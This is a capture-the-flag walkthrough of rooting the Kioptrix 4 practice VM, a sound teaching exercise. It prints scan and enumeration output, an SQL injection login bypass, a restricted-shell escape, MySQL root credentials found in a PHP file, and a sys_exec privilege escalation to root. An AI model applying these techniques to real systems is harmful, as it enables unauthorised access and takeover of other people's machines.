Rooting Kioptrix 4 Walkthrough


Kioptrix 4 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • SQL Injection in website admin panel
  • Website user password reused for secure shell
  • Website connected with mysql database with root credentials
  • System procedure availble for execution through

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 4 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap



IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------   84:3a:4b:5c:f5:54      1      60  Intel Corporate   00:0c:29:89:0d:50      1      60  VMware, Inc.     14:a5:1a:c3:5a:cc     14     840  HUAWEI TECHNOLOGIES CO.,LTD

Target VM IP Address:

Lets Scan target box with nmap to find open ports, and services listening on those ports.

root@kali:~# nmap -p- -A
Starting Nmap 7.70 ( ) at 2018-05-30 07:57 EDT
Nmap scan report for
Host is up (0.00035s latency).
Not shown: 39528 closed ports, 26003 filtered ports
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:89:0D:50 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-30T12:58:29-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
1   0.35 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds

Nmap Findings:

  • Target box is linux machine
  • Secure shell on port 22
  • Website on port 80
  • and Samba server at 445

With sql injection we bypassed authentication, but there is no page for user account “admin”

admin:garbag’ or 1=1 — –

So, we need to enumerate user accounts first. Lets use enum4linux.

root@kali:~# enum4linux

Starting enum4linux v0.8.9 ( ) on Wed May 30 08:12:46 2018
|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Enumerating Workgroup/Domain on    |
[+] Got domain/workgroup name: WORKGROUP
|    Nbtstat Information for    |
Looking up status of
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
|    Session Check on    |
[+] Server allows sessions using username '', password ''
|    Getting domain SID for    |
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
|    OS information on    |
Use of uninitialized value $os_info in concatenation (.) or string at ./ line 464.
[+] Got OS info for from smbclient:
[+] Got OS info for from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     :  500
os version      :    4.9
server type     :    0x809a03
|    Users on    |
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody   Name: nobody   Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert    Name: ,,,             Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root        Name: root         Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john        Name: ,,,             Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret            Name: loneferret,,,          Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

Found 3 users, john, robert, loneferret.


Lets bypass authentication with username john.

john:garbag’ or 1=1 — –

Lets reuse john’s credentials over ssh.

root@kali:~# ssh john@
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
john@'s password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

We are presented with restricted shell.
Lets break shell restrictions with echo os.system(“/bin/bash”)

john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)

Privilege Escalation

So, our next step is to root linux machine. Lets search for UDF library. UDF library is used to interact with system from with in mysql environment.

john@Kioptrix4:~$ whereis
lib_mysqludf_sys: /usr/lib/

Database credentials found in checklogin.php

john@Kioptrix4:/var/www$ cat checklogin.php
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
// Mysql_num_row is counting table row
// If result matched $myusername and $mypassword, table row must be 1 row
// Register $myusername, $mypassword and redirect to file "login_success.php"
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');

Database credentials are user:”root”, password:”” with empty password
Lets log into mysql and make john administrator/root

john@Kioptrix4:/var/www$ mysql -u root@localhost -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('usermod -a -G admin john');
| sys_exec('usermod -a -G admin john') |
| NULL                                 |
1 row in set (0.01 sec)
mysql> exit

Lets confirm root access.

john@Kioptrix4:/var/www$ sudo su
[sudo] password for john:
root@Kioptrix4:/var/www# whoami
root@Kioptrix4:/var/www# id
uid=0(root) gid=0(root) groups=0(root)




Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s